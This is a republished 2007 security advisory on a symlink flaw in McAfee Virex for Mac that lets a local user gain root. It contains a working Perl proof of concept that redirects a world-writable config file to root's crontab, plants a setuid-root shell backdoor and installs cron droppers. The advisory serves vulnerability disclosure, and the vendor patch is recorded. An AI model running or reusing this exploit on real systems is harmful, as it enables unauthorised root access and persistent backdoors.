McAfee VirusScan for Mac (Virex) Local root exploit and Scan Bypass

2007.03.07
Risk: High
Local: No
Remote: Yes
CWE: N/A

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ******************** Netragard, L.L.C Advisory* ******************* Strategic Reconnaissance Team ------------------------------------------------ http://www.netragard.com -- "We make I.T. Safe." [POSTING NOTICE] - ----------------------------------------------------------------------- If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated. <a href=http://www.netragard.com/html/recent_research.html> Netragard Research </a> [About Netragard] - ----------------------------------------------------------------------- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products and Web Applications commonly used by businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [Advisory Information] - ----------------------------------------------------------------------- Contact : Adriel T. Desautels Researcher : Kevin Finisterre Advisory ID : NETRAGARD-20070220 Product Name : McAfee VirusScan for Mac (Virex) Product Version : <= Virex 7.7 Vendor Name : McAfee Type of Vulnerability : Local root exploit and Scan Bypass Effort : Easy [Product Description] - ----------------------------------------------------------------------- Guard your Macintosh systems and users against all types of viruses and malicious code, even new unknown threats with McAfee VirusScan for Mac." - -- http://www.mcafee.com -- [Technical Summary] - ----------------------------------------------------------------------- McAfee Virex contains an exploitable feature that enables users to define what files should be excluded for scanning. This feature relies on a configuration file with insecure privileges and is located in /Library/Application Support. Any user on the system can modify or delete the configuration file thus affecting what Virex will scan. A simple example of such a modification would be to echo into the file which in turn would cause Virex to ignore all files on the entire system. [Technical Details] - ----------------------------------------------------------------------- An exploitable vulnerability exists in McAfee Virex that can be used to gain root privileges on an affected system. This vulnerability exists within the feature that enables users to define files for scan exclusion. The configuration file used to store scan exclusion files has insecure permissions of "rw-rw-rw" and as such can be modified or removed by any user. Upon system boot the VShieldCheck process that runs with root privileges verifies the existence of the VShieldExecute.txt file located at: /Library/Application/Sypport/Virex/VShieldExecute.txt If VShieldCheck does not find the file at boot then it recreates the file with the rw-rw-rw permissions. The exact command that it uses to set those permissions is shown below: SNOsoft-virexuser$ strings /usr/local/vscanx/VShieldCheck | grep chmod /bin/chmod a+rw '%s' >/dev/null 2>&1 The VShieldCheck process does not check for symlinks prior to creating the VShieldExecute.txt file. If an attacker creates a symlinks to: /var/cron/tabs/root from /Library/Application Support/Virex/VShieldExclude.txt then the file /var/cron/tabs/root will be created with writable permissions by the VShieldCheck process at the next system boot. Once the file is created the attacker can insert arbitrary commands into the newly created cron file that will be executed with root privileges. Example: SNOsoft-virexuser$ crontab -l crontab: no crontab for virexuser SNOsoft-virexuser$ Desktop/pwn_virex.pl Usage: Desktop/pwn_virex.pl <target> Targets: 0 . Virex 7.7.dmg SNOsoft-virexuser$ Desktop/pwn_virex.pl 0 *** Target: Virex 7.7.dmg "/Library/Application Support/Virex/VShieldExclude.txt" wait for a reboot a cron run... SNOsoft-virexuser$ crontab -l * * * * * /usr/bin/perl /Users/Shared/droptab.pl SNOsoft-virexuser$ ls -al /Library/Application\ Support/Virex/ total 88 drwxrwxr-x 5 root admin 170 Oct 15 22:08 . drwxrwxr-x 10 root admin 340 Nov 3 11:11 .. lrwxr-xr-x 1 virusbar admin 19 Oct 15 22:08 VShieldExclude.txt - -> /var/cron/tabs/root - -rwxr-xr-x 1 root wheel 530 Aug 18 2005 com.mcafee.virex.eupdate.plist - -rwxr-xr-x 1 root admin 32813 Aug 18 2005 digest.plist After a reboot and a cycle of cron there will be a setuid root shell at /Users/Shared/shX [Proof Of Concept] - ----------------------------------------------------------------------- #!/usr/bin/perl # # http://www.digitalmunition.com # written by kf (kf_lists[at]digitalmunition[dot]com) # # Following symlinks is bad mmmmmmmmmmkay! # $dest = "/var/cron/tabs/root"; $tgts{"0"} = "Virex 7.7.dmg:\"/Library/Application Support/Virex/VShieldExclude.txt\" "; unless (($target) = @ARGV) { print "\n\nUsage: $0 <target> \n\nTargets:\n\n"; foreach $key (sort(keys %tgts)) { ($a,$b) = split(/\:/,$tgts{"$key"}); print "\t$key . $a\n"; } print "\n"; exit 1; } ($a,$b) = split(/\:/,$tgts{"$target"}); print "*** Target: $a $b\n"; # Set aside a backdoor that we will chmod and chown later open(BD,">/tmp/pwnrex.c"); printf BD "main()\n"; printf BD "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); }\n"; #system("gcc -o /Users/Shared/shX /tmp/pwnrex.c"); system("cp /usr/bin/id /Users/Shared/shX"); # this is for those without gcc. # set aside root crontab dropper open(PH,">/Users/Shared/droptab.pl"); print PH "system\(\"echo \'* * * * * /usr/sbin/chown root: /Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX\' > /var/cron/tabs/root\"\)\;\n"; # rm the existing log file and symlink it to the root crontab file. A reboot will be required to exploit this. system("rm -rf $b; ln -s $dest $b"); # start up a crontab request that will be *VERY* useful after the machine has rebooted. system("echo '* * * * * /usr/bin/perl /Users/Shared/droptab.pl; sleep 90; crontab /Users/Shared/xxx' > /tmp/user_cron"); system("echo '* * * * * /usr/bin/id' > /Users/Shared/xxx"); system("crontab /tmp/user_cron"); print "wait for a reboot and a cron run...\n" *** The code above will provide a root shell *** Note: Netragard's SNOsoft Research Team was able to use this issue perform privilege escalation and gain root privileges. [Vendor Status] - ----------------------------------------------------------------------- Vendor Notified on 11/06/06 Vendor Patched on 02/13/07 Vendor advisory and patch has been posted at the following URL: https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId= 518722&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=518722 McAfee engineers were very helpful throughout the entire process. [Disclaimer] - ----------------------http://www.netragard.com------------------------- Netragard, L.L.C. assumes no liability for the use of the information provided in this advisory. This advisory was released in an effort to help the I.T. community protect themselves against a potentially dangerous security hole. This advisory is not an attempt to solicit business. <a href="http://www.netragard.com> http://www.netragard.com </a> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (Darwin) iD8DBQFF5LatQwbn1P9Iaa0RAojQAJ9VVWHCVnLDg2yG4KBt1crLC0+5NQCfZFQR 10JV11ASCMCVdPikVgMDzbk= =Z34O -----END PGP SIGNATURE-----


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top